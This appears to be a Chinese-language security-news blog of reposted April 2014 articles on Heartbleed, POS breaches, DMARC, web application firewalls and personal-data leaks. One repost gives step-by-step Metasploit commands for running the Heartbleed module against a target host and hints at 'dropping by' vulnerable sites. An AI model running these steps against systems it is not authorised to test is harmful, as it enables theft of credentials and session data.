不少網通廠商的設備,例如交換器、防火牆、Proxy伺服器、UTM、負載平衡設備等產品都可能受到漏洞影響,目前已知受影響的網通廠牌包括了Aruba Networks、Barracuda、BlueCoat、Cisco、Dell、D-Link、F5、FireEye、Fortinet、Imperva、Juniper Networks、Sophos、WatchGuard等,也有部分廠商正在清查確認中,如CheckPoint。多數廠商均已提供修補程式,各廠牌受影響產品清單和更新方式,可參考各廠牌官方網站。

資料來源:各廠商官網、Piyokango,iThome整理
轉載自《iThome》

9款Heartbleed止血自救工具

9款Heartbleed止血自救工具

堪稱史上最嚴重的資安問題Heartbleed漏洞,災情持續延燒,已有知名網站及政府資訊系統被駭,因此每個人都必須積極的保護個人資料安全。Heartbleed漏洞影響超過全球6成網站,行動裝置App等服務都遭受波及,所幸許多資安公司或開發人員,紛紛推出檢測工具。善用以下工具,幫你降低上網風險,躲過這次的資安危機。

Heartbleed Pluse是一款功能超齊全的三合一檢測App,不只可以檢查手機系統及App所使用的openSSL版本是否有問題,還可以檢測外部網站,甚至可以看到伺服器因漏洞所回傳的明碼資訊。


Heartbleed Detector
類型:Android 檢測App  
網址:goo.gl/6E0jwz
發布單位:Lookout Mobile Security
說明:行動資安廠商推出Heartbleed檢測App,可以檢查手機所使用的openSSL是否為有漏洞版本,若為有問題的版本,便會進一步檢查Heartbeat功能是否被開啟,最後依檢測顯示結果,若出現紅色驚嘆號,表示手機暴露在危險中。


Heartbleed Pluse
類型:Android 檢測App
網址:goo.gl/bmyYdH
發布單位:Trustlook Antivirus Security
說明:Heartbleed Pluse是一款功能超齊全的三合一檢測App,不只可以檢查手機系統及App所使用的openSSL版本是否有問題,還可以檢測外部網站,甚至可以看到伺服器因漏洞所回傳的明碼資訊。


Heartbleed
類型:Windows Phone檢測App
網址:goo.gl/4xuFkU
發布單位:stilatore
說明:Windows Phone手機上網也不用怕,瀏覽網頁前,先用Heartbleed App迅速檢測網站有沒有受Heartbleed漏洞影響。


Heartbleed-Ext 3.0
類型:Firefox外掛檢測工具
網址:goo.gl/WgnYdm
發布單位:proactiveRISK
說明:proactiveRISK為美國的一家資安公司,推出少數在Firefox瀏覽器可以檢測Heartbleed漏洞的附加元件,使用上相當方便,附加元件安裝完成後,當瀏覽到有問題的網頁時,便會出現警告。


Chromebleed
類型:Chrome瀏覽器擴充檢測工具
網址:goo.gl/7xgMzp
發布單位:Jamie Hoyle
說明:Chromebleed是Google Chrome瀏覽器的擴充功能,只要安裝之後,在每一次瀏覽網頁時,便會主動彈跳出網頁是否受Heartbleed漏洞影響的訊息。


Qualys SSL Labs Server Test
類型:網頁檢測服務
網址:www.ssllabs.com/ssltest/
發布單位:Qualys SSL Labs
說明:由知名資安公司推出的檢測服務,不僅可以測試伺服器是否受Heartbleed漏洞影響,還分開測試其他加密的安全指標,最後為伺服器的加密安全性評等。


Heartbleed test
類型:網頁檢測服務
網址:filippo.io/Heartbleed
發布單位:Filippo Valsorda
說明:義大利資安專家Filippo Valsorda率先以模擬OpenSSL Heartbleed漏洞的入侵方法,開發出來的檢測工具,同時這也是最多人使用的檢測網站。


Heartbleed test
類型:網頁檢測服務
網址:possible.lv/tools/hb
發布單位:Possible.lv
說明:Heartbleed漏洞爆發不久,Possible.lv資安公司馬上推出檢測網站,是事件初期常用的檢測服務之一,用法很簡單,只要輸入網址便可以測試網站是否受Heartbleed漏洞影響。


McAfee True Intelligence Feed(Beta)
類型:網頁檢測服務
網址:tif.mcafee.com/heartbleedtest
發布單位:McAfee
說明:由資安廠商McAfee推出的網頁檢測服務,可以填入網址或IP,便可以測試網站是否受Heartbleed漏洞影響。

轉載自《iThome》

AOL郵件服務疑遭駭,用戶帳號被垃圾蟲盜用

AOL郵件服務疑遭駭,用戶帳號被垃圾蟲盜用


AOL郵件用戶近日透過Twitter抱怨,自己的帳號被盜用,有垃圾蟲偽造他們的帳號寄送垃圾信件或惡意郵件給友人。AOL迄今尚未說明伺服器是否被駭,但已祭出補救措施,修改DMARC政策以避免其他郵件服務假冒AOL伺服器發送信件。

AOL在周二(4/22)表示,已將DMARC政策更改為拒絕(p=reject),因此,只要是以AOL郵件用戶名義寄信到其他支援DMARC的郵件服務時,除非該郵件通過SPF或DKIM的認證檢驗,否則便會被拒絕

此舉除了可杜絕假冒AOL用戶帳號發送垃圾郵件的駭客外,也影響了某些正規的使用者。例如以AOL郵件用戶名義透過非AOL伺服器寄送大量郵件的代理商,或是提供與友人分享功能且以AOL郵件位址寄送郵件的網站,也會影響透過第三方服務寄送郵件的小型企業,或是轉寄郵件的服務與群組郵件功能。 AOL並未說明郵件系統是否遭到入侵,也未公布受影響的規模。

包括AOL、Google、Yahoo、微軟及PayPal在內的15家電子服務與技術供應商在2002年攜手推動DMARC標準,以讓電子郵件接受端更容易判斷訊息是否來自合法的寄送人,藉以防堵垃圾訊息或網釣郵件。 AOL指出,從AOL伺服器之外代替AOL郵件用戶傳遞郵件原本是普遍且合法的行為,但這也替垃圾蟲帶來假冒發送者的機會,修改DMARC政策將可有效阻礙垃圾蟲假冒AOL用戶的行為。

轉載自《iThome

報導:Windows 8.1秋季更新將含開始功能表,免費的Windows Cloud開發中

報導:Windows 8.1秋季更新將含開始功能表,免費的Windows Cloud開發中


俄國部落客WZor近日指出,微軟即將於今年秋天釋出Windows 8.1的第二次更新版或稱Windows 8.2,該版本可望嵌入開始功能表。WZor並透露,微軟正在打造精簡的Windows Cloud作業系統,該作業系統可供免費下載或是直接內建於個人電腦的BIOS中。由於WZor曾經準確爆料許多微軟的消息,因此該文章受到眾多美國媒體的引用。

微軟作業系統部門副總裁Terry Myerson在今年4月初的微軟Build大會上曾展示含有開始功能表的Windows 8,不過,該功能並未出現在於日前釋出的Windows 8.1 Update中,當時微軟也澄清,這是下一個版本才會有的功能,WZor則說含有開始功能表的Windows 8會在秋天出爐。

↓ 四月初Build 2014大會上微軟作業系統事業群執行副總裁Terry Myerson 展示中Windows 8.1上出現了開始功能表,當時微軟會後說明,該功能表在未來版本才會有。


若該時程屬實,那麼意味著微軟縮短了Windows的更新周期。Windows 8與Windows 8.1相隔約1年,Windows 8.1與Windows 8.1 Update則只間隔半年,以此推估,Windows 8.1的第二次更新版可能會在10月出爐。

WZor還披露了微軟的Windows Could計畫指出,Windows Could是一個可免費下載或直接嵌在電腦BIOS中的客戶端精簡作業系統,它具備基本的平台功能,但使用者可付費訂閱進階功能,目前Windows Could仍處於原型機階段。

微軟對作業系統的政策似乎有些改變。先前外電即報導微軟正實驗可能免費提供的Windows 8.1 with Bing作業系統,也傳出微軟大幅調降Windows授權費,並於印度市場提供免費的Windows Phone授權。

轉載自《iThome

2014年4月24日 星期四

報告:網路應用、間諜,POS攻擊為去年資料外洩三大主因

報告:網路應用、間諜,POS攻擊為去年資料外洩三大主因


Verizon發佈最新年度資料外洩調查報告指出,網路應用攻擊及網路間諜,還有POS入侵是造成2013年企業資料外洩的三大主因。

這項報告是Verizon自2008年以來第7次年度報告,今年Verizon共蒐集50家合作的全球企業資料進行關聯分析而成,其中包括1367次資料外洩及511次間諜案件。以產業而言,政府、資訊,及金融業為最主要資訊外洩的受害者。

根據報告,在所有資料外洩事件中,有35%來自網路應用攻擊,為所有因素之冠。而在駭入網路應用的事件中, 65%的事件背後原因是意識型態或有趣,這類行為以入侵網站本身為最主要目的,而非取得特定資訊。有金錢目的的入侵佔33%,在這類攻擊中駭客藉由網釣、資料隱碼攻擊或暴力解碼取得使用者身份驗證資料,以入侵採用單因素密碼認證的網站,以便獲得金錢報酬。在各產業中,又以金融及零售業網站為駭客最主要下手目標。

第二名為網路間諜(22%),而源自外部的網路間諜事件中,又有87%來自政府相關的單位。若分析網路間諜的來源地區,則有49%來自東亞,東歐的21%次之。報告認為,中國與北韓為東亞的代表。在手法上,78% 是透過惡意郵件附檔,誘使使用者開啟並在電腦中植入後門等惡意程式。但這個數目已比去年的95%減少很多,因為2013年依附在合法網站的掛馬攻擊或稱策略式網頁攻擊(strategic web compromise, SWC)在首次入侵的比例大為增加。

去年以來屢出現重大事件的零售業收銀機(PoS) 入侵佔資料外洩原因的第三名(14%)。報告指出,85%的事件中,駭客在PoS中種下名為RAM記憶體刮刀(RAM scraper)的程式,79%被植入可以將用戶信用卡資料向外輸出的惡意程式。一半的PoS遭到暴力破解法破解,是因為使用了預設密碼或強度不夠的密碼。絕大多數的受害零售業者是警方調查時才知道自己的PoS被入侵,且往往是數星期之後的事。

盜取ATM及自助加油站信用卡的信用卡側錄軟體及犯罪軟體則分別以9%及4%佔本次調查的第四、五名。

轉載自《iThome

2014年4月22日 星期二

美國最大工藝美術連鎖Michaels證實300萬金融卡資訊外洩

美國最大工藝美術連鎖Michaels證實300萬金融卡資訊外洩

駭客是在去年5月8日到今年1月27日間鎖定Michaels Stores的POS系統,導致260萬張金融卡資訊外洩,約佔Michaels Stores所儲存金融卡總數的7%。而Aaron Brothers受影響的期間則是在去年6月26日至今年2月27日,估計有40萬張金融卡受到影響。同時已接獲銀行通知,有少數外洩的金融卡資訊已被用來盜刷。


美國最大工藝美術品連鎖商店Michaels Stores證實,經過幾個月的調查,確定Michaels stores及子公司Aaron Brothers在美國的系統受到惡意程式的攻擊,並有約300萬張金融卡資訊外洩。

Michaels Stores執行長Chuck Rubin說明,受到影響的系統內含特定的金融卡資訊,如卡片號碼與到期日等,並無證據顯示有其他包括姓名或地址等客戶資料外洩。

今年1月間Michaels Stores就已警告,該公司可能遭遇資料安全意外。現在調查確認,駭客是在去年5月8日到今年1月27日間鎖定Michaels Stores的POS系統,導致260萬張金融卡資訊外洩,約佔Michaels Stores所儲存金融卡總數的7%。而Aaron Brothers受影響的期間則是在去年6月26日至今年2月27日,估計有40萬張金融卡受到影響。同時已接獲銀行通知,有少數外洩的金融卡資訊已被用來盜刷。Michaels Stores與Aaron Brothers皆在網站上列出了POS系統被植入惡意程式的分店。

Michaels Stores將提供一年免費的身份保護與信用監控服務,也將協助客戶處理詐欺案件,並呼籲客戶要留意自己的金融卡帳號是否有可疑活動。

美國第二大連鎖商店Target今年1月對外揭露被駭客植入惡意程式,造成4000萬名客戶的金融卡資料外洩,以及7000萬客戶的姓名、地址及電話號碼的個人資料外洩,隨後美國精品百貨Neiman Marcus也坦承客戶資料外洩。三月間美國最大的美容用品連鎖店Sally Beauty也確認公司被駭,駭客竊取不到2.5萬筆含有金融卡資訊。

不論是Target、Neiman Marcus或Michaels Stores都是因為駭客在POS系統上植入惡意程式而取得客戶的金融卡資訊。資安業者IntelCrawler曾指出,滲透到這些POS系統的BlackPOS惡意程式是由代號為ree4的17歲青少年所打造,再把該程式以2000美元出售給全球的駭客。

轉載自《iThome》

2014年4月21日 星期一

駭客利用Heartbleed 漏洞入侵VPN,多因素認證防護破功

駭客利用Heartbleed 漏洞入侵VPN,多因素認證防護破功

HeartBleed漏洞自公佈以來,這項入侵案再度顯示其危害程度,因為駭客不僅可以竊取系統重要資料、加密金鑰之外,還可以主動綁架使用者的VPN連線,連強調更進階防護的多因素認證也破功。


安全廠商Mandiant表示,已有客戶遭到駭客藉由Heartbleed漏洞發動目標式攻擊,並藉以繞過多因素認證機制綁架使用者的VPN連線。

Mandiant 技術總監 Christopher Glyer指出,該公司的安全事件回應人員發現,一名駭客利用OpenSSL的HeartBleed漏洞入侵客戶VPN裝置,並自4月8日起,多次針對這台VPN裝置上的HTTPS網頁伺服器多次傳送遭改寫的heatbeat呼叫,成功取得現有已經驗證用戶工作時段的令牌(active session token),之後再進行遠端存取,以該令牌綁架多道使用者的工作時段,且冒充合法使用者。

雖然HeartBleed攻擊難以察知,但該公司還是透過分析客戶入侵偵測系統(IDS)簽章及VPN記錄兩種來源辨識並證實攻擊的存在。Glyer表示,IDS的簽章顯示可能來自入侵OpenSSL HearBleed的大量heartbeat回應,引發17,000次警報,而經分析顯示Heartbeat回應來自客戶公司內部的SSL VPN裝置。

Mandiant 指出,這樁攻擊已成功繞過了客戶公司的多因素認證及用於驗證連網系統身分的VPN用戶端軟體。至於客戶因此損失何種資料則未說明。

在HeartBleed漏洞自公佈以來,這項入侵案再度顯示其危害程度,因為駭客不僅可以竊取系統重要資料、加密金鑰之外,還可以主動綁架使用者的VPN連線,連強調更進階防護的多因素認證也破功。

Mandiant 提醒企業用戶,為防範成為HeartBleed漏洞的受害者,應及早更修補有漏洞的軟體,並安裝網路入侵偵測防禦系統簽章,以辨識有入侵意圖的流量。此外也應檢視歷史VPN記錄,辨識出IP連線是否在兩個IP位址之間反覆變換的情形,如果在短期間內有跨網路區塊、地理區、或不同服務供應商的網址變化的話,就有連線被綁架的可能。

轉載自《iThome》

2014年4月20日 星期日

web應用防火牆 – 安全傘18.5.1免費版本發佈

web應用防火牆 – 安全傘18.5.1免費版本發佈

「Safe3 Web Application Firewall"是國內安全組織保護傘網絡基於新一代Web安全技術開發的全方位企業Web信息安全產品。能有效掃瞄各種WebShell,同時也可以抵禦各種Web攻擊。


運行環境:
該軟體能運行在 Windows 2000/2003/2008 下,支援 IIS5/IIS6/IIS7.x/IIS8.x
軟體需要系統安裝.net framework 2.0

軟體主要功能:
流量控制:當前網絡P2P軟件氾濫成災,多線程下載(如迅雷等)造成網站僅有的帶寬資源嚴重枯竭,不僅影響了網站的正常瀏覽,還得為額外的流量支付大批費用。Safe3 Web Application Firewall能有效解決多線程下載帶來的流量損失,幫助站長贏得網
絡先機。

SQL注入:如今各種SQL注入工具充斥著Internet,更甚者自動化蠕蟲的Mass SQL Injection 一天就可以給成千上萬的網站掛馬,嚴重的損害了企業形象和數據安全。Safe3 Web Application Firewall採用注入模擬技術,有效攔截各種變種注入,幫助企業在互聯網中力挽狂瀾,博得生存空間。

CC攻擊:在互聯網競爭日益激烈的今天,不正當的競爭關係造成一方對另一方網站進行嚴重的CC攻擊,隨之而來的是網站癱瘓和訪問量急劇下降。Safe3 Web Application Firewall能強力阻止因CC造成的DDOS攻擊,徹底解決非法的不正當的競爭關係。

資源盜鏈:當今網站間相互複製資源(圖片和下載鏈接)已習以為常,不僅浪費帶寬資源,而且也是一種侵權行為。Safe3 Web Application Firewall可以對網站資源進行高度保護,防止盜鏈,保障原創網站的合法權益。

XSS跨站:OWASP將XSS列為2007年WEB安全威脅第一位。黑客往Web頁面裡插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裡面的html代碼會被執行,從而達到惡意用戶的特殊目的。IIS Firewall可以有效檢測包含XSS的惡意URL並攔截。

影音保護:只允許影音在線播放而不能直接下載,有力的保護了視頻網站的帶寬資源和服務質量。  

網站監控:實時監控Web目錄的變化情況並報警,強力阻止網頁被篡改。  

Web殺毒:通過分析可以掃瞄出99%的隱藏WebShell,保障web安全。
文件篡改檢查:提取重要文件的特徵,當網頁代碼被修改後可迅速從大量代碼文件中找出隱藏的後門或木馬的頁面。
掛馬清除助手:網上批量掛馬的程序隨處可見,給管理員手工清除造成了很大的困難,此功能可輕鬆解決管理員的困境。

Arp免疫:防止ARP掛馬和敏感信息被監聽截獲。當黑客入侵同一網段的主機後如果你的主機沒做任何ARP防禦措施,雖然你的主機沒被黑但客戶訪問你的網站時網頁被插入惡意代碼即ARP掛馬。同時黑客可以嗅探到此網段下所以主機的ftp、http等用戶密碼。著名黑客網站安全焦點就曾遭到這樣的攻擊。雖然基本解決了arp對本地的威脅。但是arp還可以欺騙網關,會造成本地通訊中斷,所以希望有條件的朋友最好在網關上綁定本地ip和mac地址。

軟體特點:
防火牆採用C語言編寫,運行效率極高。在每秒 100兆比特數據傳輸的大型服務器上運行良好,佔用 CPU 極少。
超強安全防護:徹底防 SQL 注入攻擊等攻擊。
徹底防迅雷、FlashGet等。
無需重啟 IIS,配置數據即刻生效。
彙集保護傘網絡多年安全經驗,強大可靠。
安裝容易,配置簡單,豐富的幫助文檔指導安裝,專門的配置工具實現輕鬆配置。

下載地址:http://www.273tech.com/Setup.7z

轉載自《FreebuF.COM》

開源Web應用防火牆-ModSecurity v2.8發佈

開源Web應用防火牆-ModSecurity v2.8發佈

ModSecurity是知名的開源web應用防火牆,它可以作為你的服務器基礎安全設施,是廣大站長的福音。目前支持Apache,IIS7和Nginx。


新特性:
1,增加狀態報告(Status Reporting)
2,增加JSON解析器
3,添加@detectXSS模塊
4,連接限制(SecConnReadStateLimit/SecConnWriteStateLimit)支持黑白名單
5,增加新變量FULL_REQUEST和FULL_REQUEST_LENGTH,支持對請求的所有內容進行規則限制。

下載網址

轉載自《FreebuF.COM》

2014年4月18日 星期五

2014亞太資安論壇展後報導-個資法退燒 資料保護著重內稽內控

2014亞太資安論壇展後報導
個資法退燒 資料保護著重內稽內控

企業資安策略往往與法規遵循息息相關,台灣最明顯的例子就是個資法,2012年10月正式上路後,不少企業思考因應之道,市場上相關解決方案蔚為熱門,2013年資安展超過3分之1的議程都是以個資法為主題。

然而一年多的時間過去,媒體先後揭露好幾起個人資料外洩事件,卻不見主管機關大規模調查或開罰,也沒有民眾發起團體訴訟,個資法所帶來的影響似乎沒有想像中那麼大,企業關注度也跟著降低,這一點由2014年資安展以個資法為主軸的議題不到10場便可證明。

在個資法光環消退後,如今企業在談資料保護,不再以防止資料外洩解決方案為主,反而強調內稽內控的重要性,趨動市場轉變有兩股力道,一個是來自主管機關或主要客戶的稽核要求,另一個則是營業秘密法修正上路後的市場需求。對擁有Know-How的企業而言,透過稽核及監控作業可以保護自身的智慧財產權,避免員工竊取公司營業秘密,即便不能防堵機密資料外洩,也能在事後的法律追訴行動中取得優勢。

電子郵件稽核需求大
日誌管理(Log management, LM)是內部稽核不可或缺的工具之一,中華數位A Log產品經理張莉屏表示,從個人資料保護法與營業秘密法的角度來看,對於存放個人/機密資料檔案或資料庫,應有適當的存取控制與保護監控措施,例如對檔案伺服器(File Server)、NAS、DB Server進行存取記錄管控,因此A Log在2014年增加對Windows Server、NetAPP與EMC儲存伺服器的支援,滿足企業對檔案存取的稽核需求。

除了對檔案或資料庫進行存取稽核外,電子郵件稽核也相當重要,綠色運算副總經理陳兆寧認為,電子郵件稽核的好處是:1.交易信件是否遭入侵或擷取;2.有沒有黑函散播、異常通訊行為、資料外洩…等狀況;3.確認各部異常郵件的流量與動向。

然而,企業往來的電子郵件數量極為龐大,如何在巨量郵件中找出異常,考驗著各家產品的搜尋技術。陳兆寧指出,傳統使用電子郵件歸檔(Archiving)系統進行稽核的作法,只能利用關鍵字搜尋的方式檢索郵件,達不到分析或探勘的目的,甚至很多稽核規則也不能套用,如:搜尋收件者同時有客戶和供應商的郵件,導致很多異常郵件會找不到,因此綠色運算發展出巨量資料比對技術MPM,將非結構化資料也納入分析,強化搜尋精確度。

其達科技經理林育信則表示,企業在進行電子郵件稽核時經常遇到的問題是,明明平常都有作歸檔與備份,但要以某個規則去搜尋電子郵件時,卻往往撈不到資料,因此其達採用3階段搜尋方式,第一步是自動排程搜尋,新郵件若符合系統所設定的稽核條件,就會自動加入稽核專案中並通知相關負責人;第二步針對自動排程搜尋過濾出來的郵件進行進階精確搜尋,稽核專案負責人可自行設定搜尋條件;最後則是將郵件分類給稽核專案中的成員做進一步檢視。

資料庫、檔案分享與郵件安全 
在落實內稽內控之外,對於資料本身的安全維護又該注意什麼?先從資料庫安全來看,WareValley營運長Kenny Kim認為有以下幾個重點:
1. 把正式線上資料庫的資料下載到開發/測試資料庫時,必須遮罩/加密。以前企業都把心力放在維護正式資料庫上,但開發與測試資料庫一樣重要,像南韓KCB信用局個資外洩事件,有一部份外洩的資料就是從測試資料庫來的。
2. 必須監控哪些終端使用者/應用程式/資料庫使用者來存取資料庫的資料,同時要有稽核記錄。
3. 避免使用者在個人電腦端儲存、複製或列印機敏資料庫內的資料,例如使用資料庫遮罩、欄位加密、禁止郵件寄送或列印...等功能。
4. 落實資料庫流程管理,任何與資料庫有關的改變與調整都要經過簽核,確保DBA有遵循公司政策去管理資料庫。

至於文件安全,優碩資訊技術行銷經理陳品翰表示,當文件在企業內部流通時,可選擇以檔案或應用程式為基礎的加密機制做管控,倘若要與外部協力廠商分享檔案,優碩則推出Trust Box電子文件保險箱機制,結合密碼認證與權限管控(如:複製、列印、編輯、有效時間)功能,文件管理者將文件與使用權限打包成.exe檔,透過網站伺服器、檔案伺服器、電子郵件等方式傳送,外部協力廠商不需安裝代理程式,只要輸入密碼就可開啟文件。

日立亞細亞Hitachi產品經理張宗宏認為,企業選擇加密軟體最重要的因素是操作方式,由於大多數使用者並非資訊專業人士,太複雜的操作程序會降低業務效率,以日立秘文產品為例,其是在應用程式將資料儲存到硬碟時才加密,因此導入前後的操作程序沒有差異,若要將檔案攜出公司,只要移動至特定資料夾並設定密碼即可,另外,在管理上也可以依員工職務或位階別彈性調整文件攜出的管控方式,亦即部份使用者可以攜出不加密的文件,部份使用者則需經過主管同意才能攜出不加密的文件。

另外,Openfind產品管理部經理林家正指出,企業郵件伺服器最好選擇雲端系統或自營雲端服務的業者,此類業者客戶數量多且型態多元,可以從中分析攻擊型態,即時更新pattern;至於功能上至少應具備以下4點:1.可以彈性設定稽核規則;2.異常通報與攔阻;3.自動退信/加密寄出;4.定期產出報表。

營業秘密管理6大風險 
最後回到文章一開頭提及的營業秘密管理,中華數位企業資料保護研究小組顧問吳毅勛指出,從實務面來看,企業在管理營業秘密時經常遇到以下幾種風險:
1.定型化契約的無效風險:某些情況下,雇主可能要求員工簽署「競業禁止合約」,合約內容若沒有差異,沒有視員工的身份、職等而有所不同的話,可能就不具備實質效力。
2.監控與侵害員工隱私的不同:企業在監控員工電腦時,必須注意以下幾點,避免引起侵犯隱私的爭議:(1)要有公開政策,說明監控目的與方式;(2)必須取得員工同意;(3)稽核要有既定程序和原因,不能老闆臨時起意想要稽查某個員工就去調資料。
3.離職SOP不足:正確的離職程序應該是員工提出時,要求其簽署「機敏資料刪除」同意書,並由稽核人員調閱前3­6個月的稽核記錄,如:檔案存取、郵件往來...等,檢視是否有異常,若有就再做進一步處理,若沒有才能進行後續的離職程序,然而目前很多企業都沒有做好離職前的稽核。
4.營業秘密的認定問題。
5.資料損失的舉證問題,包括資料的存取和輸出都要有記錄。
6.侵害營業秘密事實的認定問題。 

企業在設計營業秘密管理制度時,應該涵蓋人員安全、機敏文件、監控與稽核、研發管理、設備安全、與資訊安全共六個面向,其中在規劃監控與稽核程序時,必須注意以下3個重點: 
1.基礎設施必須留下記錄,如:郵件、網路內容、檔案輸出…等; 
2.結合現有IT設備; 
3.高風險企業應建構結合稽核程序、法務合約、IT工具的完整內控方案。

他進一步指出,企業在設計稽核政策時應該結合自身文化,再視風險高低來決定稽核頻率,舉例來說,高風險事件應做好事前稽核、且每個禮拜都要進行稽核。中風險事件(例如:寄送大量郵件)只要做到定期報表統計、特定部門行為分析即可,至於低風險事件則應搭配郵件分析工具做內容分析,確認是否含有機敏資料。為避免造成太大衝擊,建議先從高或中風險事件做起,之後再擴及到低風險事件。

轉載自《資安人科技網》

OpenSSL傳重大漏洞 台灣知名網站修復龜速

OpenSSL傳重大漏洞 台灣知名網站修復龜速

近日外電報導,在Linux環境幾乎都會使用的OpenSSL傳出重大漏洞(CVE-2014-0160),名為Heartbleed。透過此漏洞將使儲存在記憶體中的使用者帳密、SSL金鑰、Session cookie因此外洩。資安專家指出台灣仍有許多經營會員的網站使用OpenSSL卻仍未更新修復此一漏洞,完全暴露在高度風險之中。由於相關測試工具及PoC程式已經公開,有心人士可以用來測試各大網站是否有此漏洞,而會員的帳密資料也可以輕易被取得。

資安顧問公司DEVCORE執行長翁浩正表示,前兩天消息剛傳出時Google, Facebook等平常駭客打不進去的知名大站幾乎都被打掛,各網站隨即也已盡速修復,但台灣卻仍有許多網站遲遲未修復。除了Https外,pop3s, smtps, imaps也都會有此問題,系統管理者應先查詢自己的OpenSSL 版本是否在受影響範圍內,並更新到最新版。相關檢測工具、更新及修復方式可參考此文。檢測工具包括直接輸入網域名稱檢查或用工具檢測,翁浩正表示用網站檢測比較不準確,建議技術人員直接使用工具檢測。

至截稿前,台灣包括遠傳(如圖1)以及北市府的台北e大(圖2)等網站都有此漏洞,呼籲所有使用Linux環境的資訊人員應盡速處理。



轉載自《資安人科技網》

2014年4月17日 星期四

OpenSSL Heartbleed 全球駭客的殺戮祭典,你參與了嗎?

OpenSSL Heartbleed 全球駭客的殺戮祭典,你參與了嗎?

大家都說 OpenSSL Heartbleed 漏洞可望為本年度最嚴重的漏洞,到底有多嚴重呢?我相信沒有看到攻擊的範例是沒有感覺的。大家可以先看看以下的影片,利用最先釋出的兩個簡單的 PoC exploit (弱點利用程式)「ssltest.py」以及「check-ssl-heartbleed.pl」,來檢測伺服器是否有 Heartbleed 問題。檢測的同時可以獲取伺服器記憶體中的資訊,其中就可能包含了機敏資訊。


常見問題 Q & A :
請參閱:http://devco.re/blog/2014/04/11/openssl-heartbleed-how-to-hack-how-to-protect/

轉載自《網路攻防戰》

讓 Kali Linux 內的 Metasploit 利用 OpenSSL "Heartbleed" 漏洞『路過』你的網站

讓 Kali Linux 內的 Metasploit 利用 OpenSSL "Heartbleed" 漏洞『路過』你的網站

OpenSSL "Heartbleed" 漏洞的危害,我相信應該大多關心資安的人都了解。這部示範影片原作者雖然只有錄製短短2分鐘,但說實在的沒有 Metasploit 操作概念還真不好懂他在幹嘛!

步驟:
1.更新 Metasploit
2.進入 msf 中
3.指令 use auxiliary/scanner/ssl/openssl_heartbleed
4.指令 show options
5.指令 set RHOST 目標網址
6.指令 set RPORT 443
7.指令 exploit


檢視目標網址是否具有漏洞。但如果檢測到有漏洞呢?接下來就只好讓粉絲發揮想像力了!『路過』一下了!

轉載自《網路攻防戰》

『破解』Samsung Galaxy S5 的指紋辨識功能(含影片示範)

『破解』Samsung Galaxy S5 的指紋辨識功能(含影片示範)


SRLabs研究人員在 Samsung Galaxy S5 推出後三天,示範了如何使用木膠(wood-glue)做的虛擬手指來『繞過』指紋驗證機制並獲取未經授權的手機瀏覽方法。

由於 S5 的指紋辨識功能允許使用者可以不斷重試,因此攻擊者可以利用這樣的缺失不斷嘗試多組偽造的指紋,直到找到正確的配對。

備註:iPhone 5S 的指紋辨識功能也早在它推出時被破解了!




宣導概念:
指紋解鎖並非安全到牢不可破,相對的應搭配其它防護措施才能夠真的避免惡意竊取!

內文引用:http://thehackernews.com/2014/04/Samsung-Galaxy-S5-Fingerprint-Scanner-Hacked.html
轉載自《網路攻防戰》

2014年4月13日 星期日

全球網路攻擊地點、類型即時看

全球網路攻擊地點、類型即時看

Screen Shot 2014-04-11 at 3.16.22 PM

隨著網路應用越來越發達,網路攻擊也與日俱增,到底這些網路攻擊都來自那些國家,又都攻擊哪裡呢?即使有統計資料,網路世界瞬息萬變,統計完成狀況又不一樣了,那就來個即時轉播如何?

網路攻擊也能即時轉播?這要多虧了防毒軟體公司卡巴斯基的貼心功能,這家來自俄羅斯的防毒公司架設了一個即時轉播全球網路攻擊的網頁,只要連上去,就能以 3D 地球模型的模式,或世界地圖的模式,即時觀看全球各種不同網路攻擊的即時轉播,以各種不同顏色的線條表示,從哪裡發動,攻擊哪邊,是哪種形式,真是花花綠綠讓人眼花繚亂。例如在電子郵件中的病毒會顯示為橘色,惡意執行檔則顯示為黃色。

Screen Shot 2014-04-11 at 3.22.55 PM

你可以透過滑鼠與滾輪旋轉地球,點選其中任何國家,就可以看到它在全球受到網路攻擊程度的排名,排名每日更新,不過第一名往往都是卡巴斯基的母國俄羅斯,其它前五名常見國家則包括越南、印度、美國、德國等等。那麼台灣呢?以 2014 年 4 月 9 日來說,台灣名列全球最受網路攻擊國家的第28名。

Screen Shot 2014-04-11 at 3.23.09 PM

將網路世界的動態製作成地圖並非第一遭,先前已經有相當多嘗試,包括網頁 FBomb.co 統計在Twitter上使用者罵髒話的次數,統計在地圖上,不過這個統計純屬趣味、意義不大,且地圖顯示資訊與互動性也遠少於這回卡巴斯基所提供的。

雖然卡巴斯基製作這個網頁,也是在宣傳自己的防毒本業,不過不管有沒有用它的防毒軟體,光是看著網路攻擊來來去去,對網路資訊安全的重要性,或許也會多一分重視吧!

轉載自《科技新報》

2014年4月8日 星期二

教保員甄選 網路洩個資

教保員甄選 網路洩個資


誇張!林先生女友在前年中參加嘉義市公立幼稚園教保員甄選,最近卻在網路上發現通過複試的41名報名者的個資,包括姓名、地址、電話、身分證字號、出生年月日、學歷「全都露」。對此,嘉義市教育處表示,已緊急聯絡網站管理者,撤下該份名單,並追查外流管道及責任。律師葉奇鑫指出,主管機關應撤除相關連結,避免損害擴大,而被害人也可向市政府求償。

民怨:很誇張
林先生表示,3月20日女友在網路上輸入自己的名字,竟蒐尋到一筆共有41名報名者資料的「嘉義市101學年度公立幼兒園契約進用教保員聯合甄選報名表」,詳細記載每個人的姓名、地址、電話、身分證字號、出生年月日、學歷,有的人還有照片,他抱怨,「這種資料怎可在網路上流傳,很誇張!」
對此,嘉義市教育處幼兒教育科科長沈玉美表示,甄選報名表的資料被存放到一個設立在美國的網站,接獲記者告知後,已緊急聯絡該網站管理員,3月22日即已撤除,至於資料外流的原因,則會查察了解。

可向市府求償
達文西個資暨高科技法律事務所律師葉奇鑫指出,主管機關當務之急是先撤除相關連結,避免損害擴大,而因機關有無過失責任,就算找不到洩密人,市政府還是有賠償責任,被害人可向市政府求償

轉載自《蘋果日報》

2014年4月3日 星期四

金融業使用個資 金管會將清查

金融業使用個資 金管會將清查

金管會主委曾銘宗表示,將清查金融業使用個資是否符合現行規定。

立法院財政委員會今天審查通過金融控股公司法第43條,金控子公司間進行共同行銷,其營業、業務人員及服務項目,共同蒐集、處理及利用客戶個人基本資料,除了姓名及地址之外,往來的交易資料,及其他相關資料,應依個人資料保護法相關規定辦理

金管會解釋,客戶的個資包含姓名、電話、身分證字號、地址等,現在金控子公司共同行銷使用客戶資料,是選擇退出制,也就是說若客戶表達了不想被使用的時候,金控下其他子公司就不可以再使用。

